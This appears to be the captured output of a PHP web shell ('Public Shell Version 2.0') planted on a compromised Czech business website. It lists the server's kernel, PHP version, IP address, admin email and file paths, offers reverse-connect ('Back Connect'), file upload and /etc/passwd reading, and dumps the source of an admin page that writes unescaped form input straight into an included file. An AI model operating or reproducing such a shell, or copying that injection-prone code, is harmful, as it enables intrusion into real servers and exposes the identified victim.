Public Sh


Uname : Linux ispc 6.2.16-3-pve #1 SMP PREEMPT_DYNAMIC PVE 6.2.16-3 (2023-06-17T05:58Z) x86_64
PHP Version : 5.2.6-1+lenny16
Server Admin : webmaster@zednictvi-stastny.eu
Server IP : 109.105.49.240 Your IP : 216.73.216.238
Safe Mode : Safe Mode is OFF
Read etc/passwd : Disabled Functions : PHP INFO
Back Connect
IP : PORt :
'; Public Shell Version 2.0
Disable Functions: passthru,shell_exec,system,proc_open,popen,curl_multi_exec,show_source,highlight_file
Current Path : /var/www/clients/client49/web272/web/gallery/
File Upload :
Current File : /var/www/clients/client49/web272/web/gallery/adminn.php

<?
   require_once("general/protector.php"); 
   //$admin = new admin();
 
 
 if ($_POST['nadpis']!="" and $_POST['aktualita']!=""){
 $filename=date('YmdHi');
 $datum=date('d.m.Y');
  
 if (file_exists("../akce/akce.inc")){
         unlink("../akce/akce.inc");
         } 
         
 $f = fopen("../akce/akce.inc","w+");         
      fwrite($f,"<td valign=\"top\" rowspan=\"2\" width=\"800\">\n");
      fwrite($f,"<span class=\"title\">".$_POST['nadpis']."</span><br><br>\n");
      fwrite($f,"<span class=\"text\">".$_POST['aktualita']."</span>\n");
      fwrite($f,"</td>");
      fclose($f);
 }
 
?>        

<html>
<head>
  <meta http-equiv="content-type" content="text/html; charset=windows-1250">
  <LINK href="css/styles.css" type="text/css" rel="stylesheet">
  <script type="text/javascript">
      function confirmation(data)
      {
  	    var answer = confirm("Delete entry?")
	    if (answer)
	    {
		  alert("Entry Deleted")
		  window.location = data;
	    }
	    else
	    {
	      alert("No action taken")
	    }
      }
      
      function savetxt(data,pic)
      {
        popis = data + "&popis=" + document.getElementById(pic).value
      	//alert(popis)
      	window.location = popis
      }
   </script>




 <title></title>
</head>
 <body> 

 <img src="images/logo.jpg"><br><span class="boldtext">Administrace akce</span><br><br>

  
   <table border="0">
    <tr>
      <td valign="top">
        <form class="boldtextgreen" action="" method="post">
         <label>Nadpis</label><br><input type="text" name="nadpis"><br><br>
         <label>Akce</label><br><textarea rows="15" cols="50" name="aktualita"></textarea><br><br>
         <input type="submit" value="odeslat"><br><br><br><br>         


         <a href="index.php" class="boldtext"><u>Zpět na hlavní stranu</u></a><br><br>
        </form>
      </td>
    </tr>
  </table>
 </body>
</html>



Public Shell Version 2.0